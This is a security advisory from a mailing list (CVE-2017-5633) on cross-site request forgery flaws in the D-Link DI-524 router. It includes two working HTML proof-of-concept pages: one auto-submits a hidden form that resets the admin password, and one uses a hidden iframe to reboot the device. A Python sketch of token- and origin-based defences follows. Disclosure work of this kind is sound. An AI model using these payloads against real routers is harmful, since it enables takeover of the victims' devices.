Full Disclosure mailing list archives

D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities


From: Felipe Soares de Souza <fsouza.researcher () gmail com>
Date: Mon, 27 Feb 2017 19:20:49 -0300

Title:
====

D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF)
vulnerabilities

Credit:
======

Name: Felipe de Souza

Date:
=====

27-02-2017


Reference:
=====

CVE-2017-5633


Vendor:
======

D-Link is the global leader in connectivity for small, medium and large
enterprise business networking.

Product:
=======

D-Link DI-524 wireless router

Product link: https://dlink.com.br/produto/di-524150

Abstract:
=======

A Cross-Site Request Forgery (CSRF) vulnerability in the D-Link DI-524
wireless router enables an attacker to [1] reboot the device, [2] change
the admin password, and [3] possibly cause other unspecified impacts via
crafted requests.


Affected Version:
=============

9.01


Exploitation-Technique:
===================

Remote


Details:
=======


An attacker who lures an authenticated D-Link DI-524 user into browsing a
malicious website or clicking a crafted URL can exploit cross-site request
forgery (CSRF). The attacker could change the admin password or reboot
the device.


Proof Of Concept:
================


[1] The user logs in to the DI-524 wireless router.


[2] The user visits the attacker's malicious web page or clicks a crafted
link (exploit01.html | exploit02.html).


[3] exploit01.html changes the admin password; exploit02.html causes a
device reboot.



Exploit (exploit01.html):


<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<!-- hidden form targeting the router's password-change CGI -->
<form method="POST" action="http://192.168.0.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="ATTACKER">
<input type="hidden" name="p1" value="ATTACKER">
</form>
<script type="text/javascript">
// auto-submits the form as soon as the page loads
document.forms[0].submit();
</script>
</body>
</html>

Exploit (exploit02.html):

<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<!-- 1x1 iframe issues the reboot request as a plain GET -->
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>
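As an added illustration (not from the advisory or D-Link's firmware), the following Python models the checks a state-changing CGI handler on the router would need in order to refuse both PoCs: the forged requests carry the victim's cookie but no per-session token, arrive with a foreign Origin/Referer, and in exploit02's case use GET. The attacker host, session and token values are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.0.1"  # the device's own origin, as in the PoC


def issue_csrf_token(session: dict) -> str:
    """Mint a random per-session token for the admin UI to embed in its forms."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def same_origin(headers: dict) -> bool:
    """Origin (or, for GETs and older browsers, Referer) must be the router itself.
    A request carrying neither header is treated as cross-site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}" == ROUTER_ORIGIN


def state_change_allowed(method: str, session: dict, headers: dict, form: dict) -> bool:
    """Gate for state-changing handlers such as /cgi-bin/pass and /cgi-bin/dial.
    The DI-524 handlers in the advisory apply none of these three checks."""
    if method != "POST":                      # stops the GET-in-an-iframe reboot
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False                          # stops the auto-submitted form
    return same_origin(headers)


# Constructed sample traffic; attacker.invalid is a placeholder host.
SESSION = {}
TOKEN = issue_csrf_token(SESSION)
# exploit01.html: the PoC's form fields, posted from the attacker's page, no token.
FORGED_PASS = ("POST", {"Origin": "http://attacker.invalid"},
               {"rc": "@atbox", "Pa": "ATTACKER", "p1": "ATTACKER"})
# exploit02.html: iframe GET; the browser sends Referer but no Origin.
FORGED_REBOOT = ("GET", {"Referer": "http://attacker.invalid/exploit02.html"},
                 {"rc": "@", "A": "H", "M": "0", "T": "2000", "rd": "status"})
# A genuine password change submitted from the router's own admin page.
LEGIT_PASS = ("POST", {"Origin": ROUTER_ORIGIN},
              {"rc": "@atbox", "Pa": "newpass", "p1": "newpass", "csrf_token": TOKEN})


def evaluate(request: tuple) -> bool:
    method, headers, form = request
    return state_change_allowed(method, SESSION, headers, form)
```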


Credits:
=======

Felipe de Souza - Network Analyst & Programmer

twitter: https://twitter.com/felipes01
Linkedin: https://br.linkedin.com/in/felipe-soares-de-souza-a4332b33

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/